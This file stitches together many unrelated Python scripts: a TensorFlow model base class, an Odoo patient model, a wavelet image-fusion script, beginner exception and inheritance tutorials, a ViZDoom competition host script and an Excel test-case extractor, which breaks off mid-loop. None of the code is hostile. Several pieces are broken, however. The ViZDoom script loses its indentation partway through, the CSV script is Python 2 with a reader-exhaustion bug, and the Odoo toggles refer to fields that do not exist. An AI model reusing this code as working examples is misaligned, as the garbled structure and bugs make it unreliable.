        set_db_data(create_row_call)
    except Exception as e:
        logging.info("{}: Exception inserting services into database".format(datetime.now()))
        logging.info("{}: {}".format(datetime.now(), e))
        raise e
    logging.info("Services set successfully in DB.")
from __future__ import print_function
import tensorflow as tf
import numpy as np
from src.main.utils.decorators import lazy_property
from src.main.dataset.datasets import Datasets
class Config:
    """Container for model hyperparameters and dataset information.

    An instance is handed to a Model object at instantiation time.
    """

    def __init__(self, feature_num: int, batch_size: int = 50, epoche: int = 100, learning_rate: float = 0.1):
        # Keep the signature and defaults exactly as callers expect.
        self.feature_num = feature_num
        self.batch_size = batch_size
        self.epoche = epoche
        self.learning_rate = learning_rate
class Parameters:
    """Container for initial model weights and bias.

    Both values are optional; when left as None the Model class draws
    random initial values instead.
    """

    def __init__(self, weights=None, bias=None):
        self.bias = bias
        self.weights = weights
class Model:
    """Model Class for supervised machine learning models.

    The Model class is the main structure almost all supervised models in
    Machine learning should follow.  Subclasses implement `prediction`,
    `cost`, `optimization` and `error`; this base wires them together via
    lazily-evaluated properties.

    Attributes
    ----------
    dataset : Datasets
        data source; its training_data_op is re-initialized every epoch
    config : Config
        hyperparameter container (epoche, learning_rate, batch_size, feature_num)
    parameters : Parameters
        optional initial weights/bias; random values are used when absent

    Methods
    -------
    weights : tf.Variable
        variable for weight parameters
    bias : tf.Variable
        variable for bias parameters
    prediction : tf.Tensor
        Model prediction hypothesis
    cost : tf.Tensor
        Model cost function
    optimization : tf.Tensor
        Model optimization method
    error : tf.Tensor
        Model error calculation
    training:
        Model training execution
    test:
        Model testing execution
    save:
        Save model parameters as a checkpoint.
    """

    def __init__(self, dataset: Datasets, config: Config, parameters: Parameters = Parameters()):
        # NOTE(review): Parameters() here is a shared mutable default argument;
        # harmless while Parameters is never mutated, but fragile.
        self.config = config
        self.parameters = parameters
        self.dataset = dataset
        # Touch each lazy property so the graph is built eagerly at init time.
        self.weights
        self.bias
        self.prediction
        self.cost
        self.optimization
        self.error

    @lazy_property
    def weights(self):
        """Initial weights.

        Uses parameters.weights when provided, otherwise a random
        (feature_num, 1) matrix.
        """
        if self.parameters.weights is not None:
            return tf.Variable(self.parameters.weights,
                               name="weights",
                               dtype=tf.float32)
        else:
            random_weights = np.random.rand(self.config.feature_num, 1)
            return tf.Variable(random_weights,
                               name="weights",
                               dtype=tf.float32)

    @lazy_property
    def bias(self):
        """Initial bias.

        Uses parameters.bias when provided, otherwise a random (1, 1) value.
        NOTE(review): both Variables below are named "weights" (copy-paste);
        consider name="bias".
        """
        if self.parameters.bias is not None:
            return tf.Variable(self.parameters.bias,
                               name="weights",
                               dtype=tf.float32)
        else:
            random_bias = np.random.rand(1, 1)
            return tf.Variable(random_bias,
                               name="weights",
                               dtype=tf.float32)

    @lazy_property
    def prediction(self):
        """Model prediction hypothesis.

        This method mainly depends on the chosen weights and bias.
        Cost and optimization methods will help to improve weights and bias.
        """
        raise NotImplementedError("Each Model needs a prediction method.")

    @lazy_property
    def cost(self):
        """Model cost function.

        Evaluates quantitatively how far the prediction is from the
        "historical" truth.
        """
        raise NotImplementedError("Each Model needs a cost method.")

    @lazy_property
    def optimization(self):
        """Model optimization method.

        Implements a manner to optimize weights and bias by minimizing
        the cost function.
        """
        raise NotImplementedError("Each Model needs a optimization method.")

    @lazy_property
    def error(self):
        """Validation function.

        Evaluates the final output.  In regression analysis this will mainly
        be the cost function; in classification it may be the accuracy.
        """
        raise NotImplementedError("Each Model needs an error method.")

    def training(self, session):
        """Model training execution.

        Runs the optimization op over the whole dataset for config.epoche
        epochs, re-initializing the dataset iterator each epoch and printing
        the last error seen per epoch.
        """
        for epoch in range(self.config.epoche):
            session.run([self.dataset.training_data_op.initializer])
            while True:
                try:
                    _, error=session.run([self.optimization, self.error])
                except tf.errors.OutOfRangeError:
                    break
            # NOTE(review): `error` is undefined here if the very first
            # session.run raises OutOfRangeError before any batch succeeds.
            print('Epoch {:2d} error {}'.format(epoch + 1, error))

    def test(self):
        """Model test execution (not yet implemented)."""
        # raise NotImplementedError("Each Model needs a test method.")

    def save(self,
             link,
             sess,
             global_step=None,
             latest_filename=None,
             meta_graph_suffix="meta",
             write_meta_graph=True,
             write_state=True,
             strip_default_attrs=False):
        """Saves Model parameters

        This method runs the ops added by the constructor for saving variables.
        It requires a session in which the graph was launched. The variables to
        save must also have been initialized.
        The method returns the path prefix of the newly created checkpoint files.
        This string can be passed directly to a call to `restore()`.
        """
        save=tf.train.Saver()
        save.save(
            sess=sess,
            save_path=link,
            global_step=global_step,
            latest_filename=latest_filename,
            meta_graph_suffix=meta_graph_suffix,
            write_meta_graph=write_meta_graph,
            write_state=write_state,
            strip_default_attrs=strip_default_attrs
        )
|
import sys
import os
import csv
def isfloat(value):
    """Return True when value parses as a float, False on ValueError."""
    try:
        float(value)
    except ValueError:
        return False
    return True
# NOTE(review): this script is Python 2 (print statement, reader.next(),
# binary-mode csv); it will not run under Python 3 without porting.
reu_path = "C:/Users/Daway Chou-Ren/Documents/REU/"
fromDir = sys.argv[1]  # input csv, relative to reu_path
toDir = sys.argv[2]    # output csv (currently unused; see commented block)
with open(reu_path + fromDir, "rb") as csv_file:
    reader = csv.reader(csv_file)
    row_length = len(reader.next())  # consume the first row to count columns
    for a in range(1, row_length):
        # NOTE(review): the reader is exhausted after the first pass, so the
        # inner loop yields rows only for a == 1 -- likely a bug.
        for row in reader:
            for b in range(1, row_length):
                if (a == b):
                    print row[b]
                    # print a
# with open(reu_path + toDir, "wb") as new_csv:
#     writer = csv.writer(new_csv)
#     writer.writerow(mean_values)
#     writer.writerow(std_dev_values)
|
#Group Anagrams
#High Time Complexity
class Solution(object):
    def groupAnagrams(self, strs):
        """Group words that are anagrams (naive O(n^2) frequency comparison).

        Kept deliberately quadratic -- this is the "High Time Complexity"
        reference version; see the hash-keyed variant below.
        """
        groups = []
        group_keys = []  # one 26-slot letter-frequency list per group
        for word in strs:
            counts = [0] * 26
            for ch in word:
                counts[ord(ch) - 97] += 1  # assumes lowercase a-z
            # Linear scan for an existing group with the same frequencies.
            match = next((k for k, key in enumerate(group_keys) if key == counts), -1)
            if match == -1:
                groups.append([word])
                group_keys.append(counts)
            else:
                groups[match].append(word)
        return groups
class Solution(object):
    def groupAnagrams(self, strs):
        """Bucket the input strings into anagram groups.

        Two strings are anagrams iff their sorted character sequences are
        equal, so the sorted string serves as the bucket key.  Groups come
        out in first-occurrence order, members in input order.
        """
        buckets = {}
        for word in strs:
            signature = ''.join(sorted(word))
            buckets.setdefault(signature, []).append(word)
        return list(buckets.values())
# import pandas as pd
# df = pd.read_csv("/home/spaceman/my_work/Most-Recent-Cohorts-Scorecard-Elements.csv")
# df=df[['STABBR']]
# print df['STABBR'].value_counts(normalize=True)
import random
# Ask the user for a letter group (a/b/c), then print one of that group's
# three entries chosen at random.
# (The original also defined `all = ['a', 'b', 'c']`, which was never used
# and shadowed the `all` builtin — removed.)
letters = dict(
    a = {1:'q', 2:'w', 3:'e'},
    b = {1:'f', 2:'g', 3:'h'},
    c = {1:'s', 2:'d', 3:'f'}
)
choice = input("enter a, b, or c: ")
randomVar = random.randint(1, 3)
# An unrecognized choice raises KeyError, matching the original behavior.
answer = letters[str(choice)][randomVar]  # this is the line in question
print(answer)
#
# Copyright (C) 2020-2030 Thorium Corp FP <help@thoriumcorp.website>
#
from odoo import api, fields, models
# from odoo.modules import get_module_resource
from odoo.exceptions import ValidationError
class ThoriumcorpPatient(models.Model):
    """Patient master record for the Thorium Corp medical modules.

    Extends the shared abstract entity with identification, blood data and
    pregnancy/critical-condition bookkeeping.
    """

    _name = 'thoriumcorp.patient'
    _description = 'Patient'
    _inherit = 'thoriumcorp.abstract_entity'

    # Center-assigned internal id; auto-filled from an ir.sequence in
    # _create_vals when the caller does not supply one.
    identification_code = fields.Char(
        string='Identificación interna',
        help='Identificación del paciente provista por el centro de salud',
    )
    general_info = fields.Text(
        string='Información General',
    )
    is_pregnant = fields.Boolean(
        help='¿Esta embarazada?',
    )
    # NOTE(review): these compute fields declare no @api.depends and the
    # compute below is a constant placeholder — confirm intended behavior.
    blood_type = fields.Selection(
        [('A', 'A'), ('B', 'B'), ('AB', 'AB'), ('O', 'O')],
        string='Blood Type',
        sort=False,
        compute='patient_blood_info'
    )
    rh = fields.Selection(
        [('+', '+'), ('-', '-')],
        string='Rh',
        compute='patient_blood_info'
    )
    hb = fields.Selection(
        [
            ('aa', 'AA'),
            ('as', 'AS'),
            ('ss', 'SS'),
            ('sc', 'SC'),
            ('cc', 'CC'),
            ('athal', 'A-THAL'),
            ('bthal', 'B-THAL')
        ],
        string='Hb',
        # Fixed: was misspelled `computed=`, which Odoo silently ignored,
        # leaving hb a plain stored field instead of a computed one.
        compute='patient_blood_info'
    )
    critical_summary = fields.Text(
        'Important medical conditions related to this patient',
        help='Automated summary of patient important medical conditions '
             'other critical information')
    critical_info = fields.Text(
        'Free text information not included in the automatic summary',
        help='Write any important information on the patient\'s condition,'
             ' surgeries, allergies, ...')
    patient_of_medical_center_id = fields.Many2one(
        string='Medical center',
        comodel_name='medical.center',
    )
    # medical_center_secondary_ids = fields.Many2many(
    #     string='Secondary medical center',
    #     comodel_name='medical.center',
    # )

    @api.constrains('is_pregnant', 'gender')
    def _check_is_pregnant(self):
        """Reject the pregnant flag on any record whose gender is not female."""
        for record in self:
            if record.is_pregnant and record.gender != 'female':
                raise ValidationError(
                    'Invalid selection - Only a female may be pregnant.'
                )

    @api.model
    def _create_vals(self, vals):
        """Complete creation values: draw an identification code from the
        model's ir.sequence when the caller did not provide one."""
        vals = super(ThoriumcorpPatient, self)._create_vals(vals)
        if not vals.get('identification_code'):
            Seq = self.env['ir.sequence']
            vals['identification_code'] = Seq.sudo().next_by_code(
                self._name,
            )
        # vals.update({
        #     'customer': True,
        # })
        return vals

    def patient_blood_info(self):
        """Placeholder compute for blood_type / rh / hb.

        Iterates the recordset so the compute also works on multi-record
        sets; the original assigned on `self` directly, which raises for
        len(self) != 1.
        """
        for patient in self:
            patient.blood_type = 'A'
            patient.rh = '-'
            patient.hb = 'aa'

    # def _get_default_image_path(self, vals):
    #     super(ThoriumcorpPatient, self)._get_default_image_path(vals)
    #     return get_module_resource(
    #         'thoriumcorp', 'static/src/img', 'patient-avatar.png'
    #     )

    def toggle_is_pregnant(self):
        self.toggle('is_pregnant')

    def toggle_safety_cap_yn(self):
        self.toggle('safety_cap_yn')

    def toggle_counseling_yn(self):
        self.toggle('counseling_yn')
|
from os import listdir
from os.path import isfile, join
class FileNameFeeder:
    """Static helpers that list file names inside a directory."""

    @staticmethod
    def getFiles(inputDir):
        """Return the names of all regular files directly inside *inputDir*."""
        onlyfiles = [f for f in listdir(inputDir) if isfile(join(inputDir, f))]
        return onlyfiles

    @staticmethod
    def getImageFiles(inputDir):
        """Return the names of files in *inputDir* whose extension is a known
        raster-image type (png/bmp/jpg/jpeg, lowercase)."""
        fileNameList = FileNameFeeder.getFiles(inputDir)
        extensionList = ["png", "bmp", "jpg", "jpeg"]
        # rfind: compare the text after the LAST dot.  The original used
        # f.find("."), which on names with several dots ("a.b.png") compared
        # "b.png" and silently rejected valid image files.
        fileNameList = [f for f in fileNameList if f[f.rfind(".") + 1:] in extensionList]
        return fileNameList
'''
if __name__ == "__main__":
feeder = FileNameFeeder()
print feeder.getImageFiles(".")
'''
|
#상속 : 기존 클래스를 변경하지 않고 기능을 추가하거나 기존 기능을 변경하여 사용할때 사용
#개발기간을 단축하거나 코드의 중복을 피할 수 있다.
#SmartTv를 만들고 싶어 => 기존의 Tv클래스를 상속받아서 기능을 추가하면 SmartTv
class Tv:  # parent (super) class
    """A plain television that can only be powered on and off."""

    def powerOn(self):
        """Print the power-on message."""
        print("TV를 켭니다.")

    def powerOff(self):
        """Print the power-off message."""
        print("TV를 끕니다.")
class SmartTv(Tv):  # child (sub) class
    """A Tv extended with set-top-box controls and content search."""

    def settopOn(self):
        """Print the set-top-box power-on message."""
        print("셋톱을 켭니다.")

    def settopOff(self):
        """Print the set-top-box power-off message."""
        print("셋톱을 끕니다.")

    def search(self, search):
        """Print a message announcing a search for *search*."""
        # %-formatting kept so the output matches the original byte-for-byte.
        print("%s를 검색합니다."%search)
# Every field/method inherited from the parent class is available on the
# child.  Inheritance and overriding are the foundations of class design.
stv = SmartTv()  # create a child-class instance
stv.powerOn()  # inherited from Tv
stv.settopOn()  # defined on SmartTv
stv.search("나혼자산다")  # defined on SmartTv
stv.settopOff()  # defined on SmartTv
stv.powerOff()  # inherited from Tv
|
import unittest
from katas.kyu_7.eighties_kids_5_you_cant_do_that_on_tv import bucket_of
class BucketTestCase(unittest.TestCase):
    """Unit tests for bucket_of: maps a phrase to a bucket label
    ('air', 'water', 'slime' or 'sludge') based on the words it contains."""

    def test_equals(self):
        self.assertEqual(bucket_of('wet water'), 'water')

    def test_equals_2(self):
        self.assertEqual(bucket_of('slime water'), 'sludge')

    def test_equals_3(self):
        self.assertEqual(bucket_of(
            'I don\'t know if this will work'), 'slime')

    def test_equals_4(self):
        self.assertEqual(bucket_of(
            'I don\'t know if this will work without watering it first.'),
            'sludge')

    def test_equals_5(self):
        # Empty input yields an empty bucket of air.
        self.assertEqual(bucket_of(''), 'air')

    def test_equals_6(self):
        self.assertEqual(bucket_of('slimeslimeslimeslimewater'), 'sludge')
|
# -*- coding: utf-8 -*-
"""
Created on Mon Dec 3 17:38:40 2018
@author: srikant nayak
"""
from PIL import Image
import pywt
import numpy as np
import matplotlib.pyplot as plt
# Load the two source images as 8-bit grayscale and decompose each with a
# single-level 2-D Haar DWT.  dwt2 returns (LL, (LH, HL, HH)).
img1 = Image.open('s1.gif').convert('L')
img2 = Image.open('ss2.gif').convert('L')
img1_ary = np.array(img1)
img2_ary = np.array(img2)
import pywt  # NOTE(review): duplicate of the import at the top of the file
coeff1 = pywt.dwt2(img1_ary,wavelet='haar')
coeff2 = pywt.dwt2(img2_ary,wavelet='haar')
LL1, (LH1, HL1, HH1) = coeff1
LL2,(LH2,HL2,HH2 ) = coeff2
def fuse_coeff(coeff1, coeff2):
    """Fuse two same-shaped wavelet coefficient arrays by averaging them."""
    return (coeff1 + coeff2) / 2
# Fuse approximation (i == 0) and detail coefficients level by level.
# The original iterated range(len(coeff2) - 1); since dwt2 returns a 2-tuple
# that meant ONLY the LL band was fused and the detail bands were dropped
# before reconstruction.
fusedCooef = []
for i in range(len(coeff2)):
    if(i == 0):
        fusedCooef.append(fuse_coeff(LL1,LL2))
    else:
        # Fuse the (LH, HL, HH) detail triplet of this level.
        c1 = fuse_coeff(coeff1[i][0], coeff2[i][0])
        c2 = fuse_coeff(coeff1[i][1], coeff2[i][1])
        c3 = fuse_coeff(coeff1[i][2], coeff2[i][2])
        fusedCooef.append((c1,c2,c3))
# Inverse transform of the fused coefficient pyramid.
fusedImage = pywt.waverec2(fusedCooef, wavelet='haar')
plt.imshow(fusedImage)#,cmap='gray')
# num1=int(input('enter the number'))
# num2=int(input('enter the number 2'))
# div=None
# try:
# div=num1/num2
# print('try runs')
# except:
# print('exection ocuured')
# print('continue execution')
# if div!=None:
# print('result:',div)
import traceback,sys
#Types of error
#1. Compile time error
#2. Logical error(Deviation in output)-Corrected by debugging technique
#3. Runtime error(Serious error occurs during execution time).
'''print(BaseException.mro())#is an exception class for all runtime errors
print(Exception.mro())
print(ZeroDivisionError.mro())
print(IndexError.mro())
print(SyntaxError.mro())'''
def func():
    """Print a marker showing the exception-handler helper ran."""
    # (spelling of the output string preserved from the original)
    print('fuction running')
# Interactive try/except/else/finally demonstration.
# num1=int(input('Enter a number'))
# num2=int(input('Enter another number'))
div=None
a=[12,45,65]
try:
    # Both the int() conversions (ValueError) and the division
    # (ZeroDivisionError) can raise inside this block.
    num1=int(input('Enter a number'))
    num2=int(input('Enter another number'))
    #print(a[5])
    div=num1/num2
    print('Try runs ')
# Alternative, progressively narrower handlers (kept for reference):
#except:
#except(BaseException)as e:
#except(Exception)as e:
#except(ArithmeticError)as e:
except(ZeroDivisionError,ValueError)as e:
    traceback.print_exc(file=sys.stdout)
    print('Exception occured')
    func()
else:
    # Runs only when the try block completed without raising.
    print('Result:',div)
finally:
    # Runs on both the success and the exception path.
    print('finally executes')
'''except(ZeroDivisionError)as e:
    traceback.print_exc(file=sys.stdout)
    print('Exception occured')
except(ValueError)as e:
    print(e)
    traceback.print_exc(file=sys.stdout)
    print('Exception occured')'''
print('Main continues')
'''if div:
    print('Result:',div)'''
class AgeException(Exception):
    """Domain exception raised when an employee's age is below the minimum."""

    def __init__(self, msg):
        # Delegate message storage to the built-in Exception machinery.
        super().__init__(msg)
class Employee:
    """An employee whose age must be at least 18 years."""

    def __init__(self, name, age):
        # Guard clause: reject under-age employees before storing anything.
        if age < 18:
            raise AgeException('Age cannot be less than 18 years')
        self.age = age
        self.name = name
# Demonstration: a valid Employee (age 22) does not raise, so the except
# branch below is skipped.
try:
    ob = Employee('Sathish', 22)
    # raise AgeException('Age cannot be less than 18 years')
    # __main__.AgeException: Age cannot be less than 18 years
except(AgeException) as e:
    print('Exception Age Handled')
print('Main Continues')
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from argparse import ArgumentParser, ArgumentDefaultsHelpFormatter
import vizdoom as vzd
from tabulate import tabulate
from warnings import warn
MAX_MAP = 5
MAX_PLAYERS = 8
MAX_TIMELIMIT = 999
DEFAULT_TIMELIMIT = 10
DEFAULT_WAD_FILE = "cig2017.wad"
FRAMERATE = 35
if __name__ == "__main__":
    # Command-line interface for the competition host.
    parser = ArgumentParser("Host script for ViZDoom Copmetition at CIG 2017.",
                            formatter_class=ArgumentDefaultsHelpFormatter)
    parser.add_argument('-b', '--bots', metavar="BOTS_NUM", dest='bots_num',
                        default=0, type=int,
                        help='number of bots to add [0,15]')
    parser.add_argument('-p', '--players', metavar="PLAYERS_NUM", dest='players_num',
                        default=1, type=int,
                        help='number of players [1,16]')
    parser.add_argument('-m', '--map', metavar="MAP", dest='map',
                        default=1, type=int,
                        help='map number [1,{}]'.format(MAX_MAP))
    parser.add_argument('-t', '--time', metavar="TIMELIMIT", dest='timelimit',
                        default=DEFAULT_TIMELIMIT, type=float,
                        help='timelimit in minutes [1,{}]'.format(MAX_TIMELIMIT))
    parser.add_argument('-r', '--record', metavar="RECORD_FILE", dest='recordfile',
                        default=None, type=str,
                        help='file where the match will be recorded')
    parser.add_argument('-li', '--log-interval', metavar="LOG_INTERVAL", dest='log_interval',
                        default=None, type=float,
                        help='results logging inreval in minutes')
    parser.add_argument('-dc', '--console', dest='disable_console', action='store_true',
                        default=False,
                        help='disables console output')
    # parser.add_argument('-w', '--watch', dest='watch', action='store_const',
    #                     default=False, const=True,
    #                     help='roam the map as a ghost spectator')
    parser.add_argument('-w', '--wad', dest='wad',
                        default=DEFAULT_WAD_FILE,
                        help='Wad file with maps.')
    args = parser.parse_args()
    players_num = args.players_num
    bots_num = args.bots_num
    map = "map0" + str(args.map)
    console_enabled = not args.disable_console
    timelimit = args.timelimit
    # The '--watch' option above is commented out (its '-w' flag was reused
    # for '--wad'), so the parsed namespace has no 'watch' attribute and the
    # original `watch = args.watch` raised AttributeError on every run.
    # Fall back to the commented-out option's default of False.
    watch = getattr(args, 'watch', False)
    record_file = args.recordfile
    log_interval_min = args.log_interval
    # Convert the logging interval from minutes to engine tics.
    if args.log_interval is not None:
        log_interval_tics = int(args.log_interval * 60 * FRAMERATE)
    else:
        log_interval_tics = None
    # Sanity-check the parsed arguments before touching the engine.
    if players_num < 0:
        raise ValueError("Number of players should be >= 0. Got: {}".format(players_num))
    if bots_num + players_num > MAX_PLAYERS:
        raise ValueError("Maximum number of players and bots: {}. Got: {}".format(MAX_PLAYERS, bots_num + players_num))
    # Reserve one extra slot for this host process (the "ghost" spectator).
    players_num += 1
    if timelimit < 0:
        raise ValueError("Negative time limit given: {}".format(timelimit))
    if timelimit > MAX_TIMELIMIT:
        raise ValueError(
            "Maximum timelimit of {} exceeded. "
            "This must be an erorr: {}".format(MAX_TIMELIMIT, timelimit))
game = vzd.DoomGame()
game.set_doom_map(map)
game.set_doom_scenario_path(args.wad)
game.add_game_args("-deathmatch +viz_nocheat 1 +viz_debug 0 +viz_respawn_delay 10")
game.add_game_args("+sv_forcerespawn 1 +sv_noautoaim 1 +sv_respawnprotect 1 +sv_spawnfarthest 1 +sv_crouch 1")
game.add_game_args("+viz_spectator 1")
game.add_game_args("+name ghost")
game.add_game_args("-host {}".format(players_num))
game.add_game_args("+timelimit {}".format(timelimit))
game.add_game_args("-record {}".format(record_file))
game.set_console_enabled(console_enabled)
game.add_available_button(vzd.Button.TURN_LEFT)
game.add_available_button(vzd.Button.TURN_RIGHT)
game.add_available_button(vzd.Button.MOVE_RIGHT)
game.add_available_button(vzd.Button.MOVE_LEFT)
game.add_available_button(vzd.Button.MOVE_FORWARD)
game.add_available_button(vzd.Button.MOVE_BACKWARD)
game.add_available_button(vzd.Button.TURN_LEFT_RIGHT_DELTA)
game.add_available_button(vzd.Button.LOOK_UP_DOWN_DELTA)
game.add_available_button(vzd.Button.SPEED)
game.add_available_button(vzd.Button.MOVE_UP)
game.add_available_button(vzd.Button.MOVE_DOWN)
if watch:
raise ValueError()
# game.set_mode(vzd.Mode.SPECTATOR)
else:
game.set_mode(vzd.Mode.PLAYER)
game.set_window_visible(False)
game.set_screen_resolution(vzd.ScreenResolution.RES_1024X576)
plural = "s"
pn = "no"
if players_num > 1:
pn = players_num - 1
if players_num == 2:
plural = ""
if record_file is not None and bots_num > 0:
warn("Recording won't work properly with bots!")
print("Starting vizdoom CIG 2017 host for {} player{}.".format(pn, plural))
print("Configuration:")
print(tabulate([
("WAD", args.wad),
("TIMELIMIT (min)", timelimit),
("MAP", map),
("PLAYERS", players_num - 1),
("BOTS", bots_num),
("CONSOLE", console_enabled),
("RECORDFILE", record_file),
("LOG_INTERVAL (min)", log_interval_min)
], tablefmt="fancy_grid"
))
print()
game.init()
game.send_game_command("removebots")
for i in range(bots_num):
game.send_game_command("addbot")
player_count = int(game.get_game_variable(vzd.GameVariable.PLAYER_COUNT))
def gather_log():
l = []
for player_i in range(2, player_count + 1):
fragcount = game.get_game_variable(eval("vzd.GameVariable.PLAYER{}_FRAGCOUNT".format(player_i)))
l.append([player_i, fragcount])
return l
def print_log(log, t):
print("time: {:0.2f} minutes".format(t / 60 / FRAMERATE))
print(tabulate(log, ["Player", "Frags"], tablefmt="fancy_grid"))
print()
    print("Host running.")
    # Main loop: step the engine until the timelimit ends the episode,
    # emitting a frag-count snapshot every log_interval_tics tics when
    # interval logging was requested.
    while not game.is_episode_finished():
        game.advance_action()
        t = game.get_episode_time()
        if log_interval_tics is not None:
            if t % log_interval_tics == 0:
                log = gather_log()
                print_log(log, t)
    # Final standings after the episode finished.
    print(20 * "#")
    print("Final results:")
    t = game.get_episode_time()
    log = gather_log()
    print_log(log, t)
|
import codecs
import openpyxl
import sys, os
from time import gmtime, strftime
from pathlib import Path
from openpyxl.utils import get_column_letter, column_index_from_string
import array as arr
import numpy as np
# Test-case extraction from an Excel workbook.
# new_old selects which checkpoint list is used further below (0 = old
# 7-point template, 1 = new template).
new_old = 1
#excel = "C:/Users/daccl.hy/Desktop/1.xlsx"
excel = "D:/temp.xlsx"
source_name = ''
function_name = ''
duong_link = ''
function_csv = ''
# Read the real workbook path out of cell A7 of the bootstrap workbook.
wb_t = openpyxl.load_workbook(excel)
sheet_t = wb_t['Sheet1']
excel = sheet_t["A7"].value
excel = excel.replace("\\", '/')
####note
# NOTE(review): the two assignments below override the path read from A7
# with hard-coded values — confirm whether this debug override should stay.
excel = 'C:/Users/luuco/Desktop/auto/New folder/vCIR_Cnt_Flag_Time/vCIR_Cnt_Flag_Time.xlsx'
function_name = 'Sensor_Processing_sfunc.c' + '/'
####note
wb = openpyxl.load_workbook(excel)
#-----------------write date of testing----
sheet = wb['テストケース表']
#sheet2 = wb['Sheet2']
#sheet3 = wb['Sheet3']
#--------------------------------------------------------
file = "C://Users//daccl.hy//Desktop//auto//func_additional_signal_cal_IO.html"
#sheet.max_row
# scan row 3 to find the ID (and, next to it, the Comment) column
print('total column = ', sheet.max_column)
print('total row = ' ,sheet.max_row)
print('\n\n')
print('-------STARTING FIND TEST CASE-------')
print('\n\n')
x = 1
while x <= sheet.max_column:
    if str(sheet.cell(3, x).value) == 'ID':
        break
    x += 1
ID = x
Comment = ID +1
# find the row where the first test case starts
x = 4
while x <= sheet.max_row:
    if not str(sheet.cell(x, 2).value) == 'None':
        break
    x += 1
# print(x) — starting row of the first test case
# collect the test cases: each non-empty row becomes a '$$$'-separated
# record of [start-id, name, ID-column, Comment-column]
all_table = ['']*(sheet.max_row + 1)
while x <= sheet.max_row:
    if not str(sheet.cell(x, 1).value) == 'None':
        all_table[x] = str(sheet.cell(x, 1).value).replace('-','') + '$$$' + str(sheet.cell(x, 2).value) + '$$$' + str(sheet.cell(x, ID).value) + '$$$' + str(sheet.cell(x, Comment).value) + '$$$'
    x +=1
# Append the END id of each case (the id on the row before the next case).
x =5
y = 0
while x <= sheet.max_row:
    if not str(sheet.cell(x, 2).value) == 'None':
        all_table[x - y -1] = all_table[x - y -1] + str(sheet.cell(x -1, 1).value).replace('-','')
        y = 0
    else:
        y +=1
    x +=1
#-------------- drop 'None' entries ----------------------
# Compact all_table into result_t, keeping only records with a real name.
tring_t = ''
tring_g =''
result_t = ['']*(sheet.max_row + 1)
x = 4
y = 0
while x <= sheet.max_row:
    tring_g = all_table[x].split('$$$')
    #print(tring_g)
    if len(all_table[x]) >4:
        if not tring_g[1] == 'None':
            result_t[y] = all_table[x]
            y +=1
    x +=1
#x =0
#while x <= sheet.max_row:
#    print(result_t[x])
#    x +=1
#result_t[y] = tring_g[0] + ',' + tring_g[3] + ',' + tring_g[1] + ',' + tring_g[2]
# Re-pack each record as '$'-separated [start, end, name, ID, Comment] and
# accumulate every test-case name into array_testcase.
x = 0
i = 0
array_testcase = '' # all name test case
while x <= sheet.max_row:
    tring_g = result_t[x].split('$$$')
    #print(len(tring_g))
    if len(tring_g) > 2:
        result_t[x] = tring_g[0] + '$' + tring_g[4] + '$' + tring_g[1] + '$' + tring_g[2]+ '$'+ tring_g[3]
        array_testcase = array_testcase + ',' + tring_g[1]
        i +=1
    x +=1
# all var test case
#x =0
line_of_test = i
#while x <= sheet.max_row:
#    print(result_t[x])
#    x +=1
#-------------------
max_row = sheet.max_row
# NOTE(review): this overwrites the count computed just above with the sheet
# row count — confirm which value line_of_test is supposed to hold.
line_of_test = sheet.max_row
max_column = sheet.max_column
test_Anal = ''
string_result = result_t.copy()
string_copy = result_t.copy()
string_result_1 = string_copy.copy()
p = 0
while p < (y + 1):
    print(p, '\t' ,string_result_1[p].replace('$', '\t'))
    p += 1
print('\n\n')
print('\n\n')
# delete None
p = 0
print('\n\n')
print('\n\n')
print('------------All test point following 14 point ---------')
print('\n')
# Checkpoint keywords differ between the old and the new template.
if new_old == 0:
    point_check = ['coverage_p1', 'div_zero_p2', 'overflow_p3', 'casting_p4', 'underflow_p5','array_p6', 'pointer_p7']
else:
    point_check = ['input_variable_p1', 'input_func_return_p2', 'condition_p3', 'sw_case_p4', 'zero_division_p5','calc_overflow_p6', 'casting_overflow_p8', 'array_p9', 'pointer_p10', 'loop_p11' ]
# For every checkpoint keyword, print the matching test cases and a total.
for k in point_check:
    print('-----------------------------', k, '-------------------------------')
    p = 0
    h = 1
    string_t3 = ''
    while p < i:
        if k in string_result[p]:
            string_result[p] = string_result[p]#.replace('-', '')
            string_t3 = string_result[p].split("$")
            #print(string_t3)
            print( string_t3[2] + '\t' + string_t3[4] + '\t' + string_t3[0] + '~' + string_t3[1])
            h += 1
        p +=1
    print('-------------------total =--------',h-1, '--------------------------' )
    print('\n\n')
#exit()
#wb.save(excel)
# Switch to the input/output data-analysis sheet.
sheet = wb['入出力データ分析表']
#-------------------------------------------------------------------------------------------------------
#print(sheet.max_column, sheet.max_row)
# find the number of input columns (first non-empty cell in row 3, from col 4)
a = 4
while(a <= sheet.max_column):
    if str(sheet.cell(3, a).value) == 'None':
        a += 1
    else:
        break
number_colum_input = a
#print(number_colum_input)
# find the 'Type' row and remember its index
a = 1
while(a <= sheet.max_row):
    if str(sheet.cell(a, 1).value) == 'Type':
        cel_type = a
        break
    else:
        a += 1
#print(cel_type)
# Collect the declared type of every input column.
type_var = ['']*(number_colum_input + 5)
a = 3
while a <= (number_colum_input - 1):
    type_var[a] = str(sheet.cell(cel_type, a ).value)
    #print(type_var[a])
    a +=1
# count the variable-name rows and collect the variable names
a = 7
while(a <= sheet.max_row):
    if str(sheet.cell(a, 1).value) == 'None':
        a += 1
    else:
        break
number_row_var = a
#print(number_row_var)
# Concatenate the (possibly multi-row) variable name for each column,
# stripping placeholder 'None' cells and the source-file prefixes.
var_name = ['']*(number_colum_input + 5)
a = 3
while a <= (number_colum_input - 1):
    b = 6
    while b <= (number_row_var -1):
        var_name[a] = var_name[a] + str(sheet.cell(b, a ).value)
        var_name[a] = var_name[a].replace('None','')
        var_name[a] = var_name[a].replace('AMSTB_SrcFile.c/','')
        var_name[a] = var_name[a].replace(function_name,'')
        # also strips the source-file prefix, e.g. 'Sensor_Processing_sfunc.c/'
        b += 1
    a +=1
def delete_t(a):
    """Strip every whitespace character (space, tab, CR, LF) from *a*."""
    for ws in (' ', '\t', '\n', '\r'):
        a = a.replace(ws, '')
    return a
# join each declared type with its (whitespace-stripped) variable name
a = 3
while a <= (number_colum_input - 1):
    type_var[a] = delete_t(type_var[a]) + ' '+ delete_t(var_name[a])
    #print(type_var[a])
    a +=1
# find the first 'Test Analysis Item' row (the header uses non-breaking
# spaces, hence the \xa0 escapes)
a = 1
while(a <= sheet.max_row):
